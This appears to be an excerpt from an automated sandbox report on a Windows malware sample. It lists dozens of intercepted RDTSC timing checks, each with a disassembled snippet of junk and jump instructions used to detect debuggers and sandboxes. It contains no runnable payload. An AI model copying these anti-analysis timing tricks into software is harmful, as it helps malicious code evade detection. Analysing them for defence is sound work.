Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E4838B second address: E4839A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC734882076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E4FBBB second address: E4FBC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E62623 second address: E62627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E62627 second address: E6262B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E6262B second address: E62631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E62631 second address: E6264E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F782h 0x00000007 pushad 0x00000008 je 00007FC734E5F776h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7B568 second address: E7B575 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7A2EB second address: E7A2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7A2EF second address: E7A2F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7A2F5 second address: E7A2FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7A46E second address: E7A474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7A474 second address: E7A478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7A478 second address: E7A47C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7A47C second address: E7A4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC734E5F77Ch 0x0000000d pushad 0x0000000e ja 00007FC734E5F77Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007FC734E5F776h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7A4A3 second address: E7A4AD instructions: 0x00000000 rdtsc 0x00000002 je 00007FC734882076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7A4AD second address: E7A4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7A789 second address: E7A78D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7A78D second address: E7A79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FC734E5F77Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7A79D second address: E7A7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7A7AA second address: E7A7C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Fh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7A947 second address: E7A94F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7A94F second address: E7A992 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F787h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FC734E5F778h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jns 00007FC734E5F787h 0x0000001a push eax 0x0000001b pop eax 0x0000001c jmp 00007FC734E5F77Fh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7A992 second address: E7A9A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7AE6E second address: E7AE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jc 00007FC734E5F776h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7AE81 second address: E7AE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7AE85 second address: E7AE91 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC734E5F776h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7CC08 second address: E7CC0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E7FAF1 second address: E7FAFB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC734E5F776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E81385 second address: E81389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51A0F4C second address: 51A0F52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51A0F52 second address: 51A0F5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, E8C8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51A0F5B second address: 51A0F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC734E5F788h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51A0F7D second address: 51A0FD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 11D4h 0x00000007 pushfd 0x00000008 jmp 00007FC73488207Dh 0x0000000d xor ecx, 1205C896h 0x00000013 jmp 00007FC734882081h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e jmp 00007FC73488207Eh 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC734882087h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51A0FD7 second address: 51A0FDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190E22 second address: 5190F02 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FC734882086h 0x0000000d jmp 00007FC734882085h 0x00000012 popfd 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov edx, eax 0x00000018 pushfd 0x00000019 jmp 00007FC734882088h 0x0000001e xor eax, 5C9D5EC8h 0x00000024 jmp 00007FC73488207Bh 0x00000029 popfd 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d mov ch, bh 0x0000002f movzx ecx, dx 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FC734882089h 0x0000003b sub ax, AE96h 0x00000040 jmp 00007FC734882081h 0x00000045 popfd 0x00000046 pushfd 0x00000047 jmp 00007FC734882080h 0x0000004c sub ch, FFFFFFB8h 0x0000004f jmp 00007FC73488207Bh 0x00000054 popfd 0x00000055 popad 0x00000056 mov ebp, esp 0x00000058 jmp 00007FC734882086h 0x0000005d pop ebp 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190F02 second address: 5190F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190F06 second address: 5190F0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190F0C second address: 5190F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51E0082 second address: 51E0096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, CD9Bh 0x00000007 mov bx, cx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51E0096 second address: 51E009A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51E009A second address: 51E00A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51E00A9 second address: 51E0110 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FC734E5F77Eh 0x00000010 pop ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC734E5F77Eh 0x00000018 add ax, 7128h 0x0000001d jmp 00007FC734E5F77Bh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC734E5F786h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170133 second address: 5170137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170137 second address: 517013B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 517013B second address: 5170141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170141 second address: 5170150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170150 second address: 5170154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170154 second address: 5170169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov cx, F6E3h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5170169 second address: 51701A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC73488207Fh 0x00000008 pop eax 0x00000009 call 00007FC734882089h 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push dword ptr [ebp+0Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movzx ecx, di 0x0000001b push ebx 0x0000001c pop eax 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190B60 second address: 5190B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ecx 0x00000011 mov ax, dx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190B7D second address: 5190B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190B99 second address: 5190B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190B9D second address: 5190BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190BBA second address: 5190BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190BC0 second address: 5190BCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov eax, edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190706 second address: 519070C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 519070C second address: 5190722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC73488207Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190722 second address: 5190769 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 36BAh 0x00000007 pushfd 0x00000008 jmp 00007FC734E5F77Bh 0x0000000d add si, 1E5Eh 0x00000012 jmp 00007FC734E5F789h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC734E5F77Dh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190769 second address: 519076F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 519076F second address: 5190773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 5190684 second address: 51906A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov ax, 83DBh 0x00000010 mov esi, 25A782B7h 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51906A7 second address: 51906B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0E91 second address: 51D0EEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882085h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC734882088h 0x00000011 jmp 00007FC734882085h 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC73488207Ch 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0EEB second address: 51D0F1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov eax, 535C7FB9h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov si, 6CF1h 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FC734E5F782h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0F1A second address: 51D0F20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0F20 second address: 51D0F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0F26 second address: 51D0F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51D0F2A second address: 51D0F2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B031E second address: 51B0356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC73488207Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 mov ax, 140Fh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B0356 second address: 51B038B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, A446h 0x00000007 push edi 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC734E5F782h 0x00000016 or cl, FFFFFFE8h 0x00000019 jmp 00007FC734E5F77Bh 0x0000001e popfd 0x0000001f mov ch, 08h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B038B second address: 51B0391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B0391 second address: 51B03A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B03A1 second address: 51B03A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B03A5 second address: 51B03AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B03AB second address: 51B03D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC734882087h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B03D7 second address: 51B03DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B03DD second address: 51B03E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: 51B03E1 second address: 51B040B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC734E5F77Dh 0x00000012 jmp 00007FC734E5F77Bh 0x00000017 popfd 0x00000018 push eax 0x00000019 push edx 0x0000001a mov bh, cl 0x0000001c rdtsc
